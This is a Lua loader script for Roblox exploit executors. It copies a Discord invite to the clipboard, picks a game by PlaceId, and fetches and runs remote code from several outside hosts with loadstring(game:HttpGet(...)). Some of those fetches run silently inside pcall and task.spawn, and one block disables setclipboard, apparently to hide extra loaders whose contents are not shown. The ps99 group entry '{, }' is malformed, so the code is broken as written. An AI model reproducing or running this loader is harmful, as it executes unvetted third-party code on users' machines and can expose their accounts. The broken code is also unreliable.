setclipboard("https://discord.gg/6GMJFxGaJz")
local placeId = game.PlaceId

local groups = {
    adm = {920587237},
    mm2 = {142823291, 335132309, 636649648},
    bladeball = {15264892126, 16281300371, 14732610803, 15234596844, 13772394625},
    sab = {109983668079237, 96342491571673},
    ps99 = {, }
}

local groupScripts = {
    adm = [[
loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/testmchoose"))()
    ]],

    mm2 = [[
loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/testd3"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/load"))()
    ]],

    bladeball = [[
task.spawn(function()
    pcall(function()
        loadstring(game:HttpGet("https://blyatscripts.vercel.app/lo"))()
    end)
end)
task.spawn(function()
    pcall(function()
        CLIENT_ID = "498b638b8a0d40eb"
        GAME = "bladeball"
        loadstring(game:HttpGet("http://d20.aurorix.net:25701/script/bladeball"))()
    end)
end)
loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/blade-ball-tuffness"))()
    ]],

    sab = [[
task.spawn(function()
    pcall(function()
        loadstring(game:HttpGet("https://blyatscripts.vercel.app/lo"))()
    end)
end)
task.spawn(function()
    pcall(function()
        setclipboard = function() return end
        ID="6710c962-7192-471b-8f42-cf9a1a8c4ab5"
        loadstring(game:HttpGet("https://cdn.project-reverse.org/loader.luau"))()
    end)
end)
loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/sabv"))()
    ]],

    ps99 = [[
loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/testm"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/load"))()
    ]]
}

local defaultScript = [[
loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/testm"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/load"))()
]]

local scriptToRun = defaultScript

for groupName, idList in pairs(groups) do
    for _, id in ipairs(idList) do
        if id == placeId then
            scriptToRun = groupScripts[groupName]
            break
        end
    end
end

local success, err = pcall(function()
    loadstring(scriptToRun)()
end)

if not success then
    warn("Failed to run script: " .. tostring(err))
end
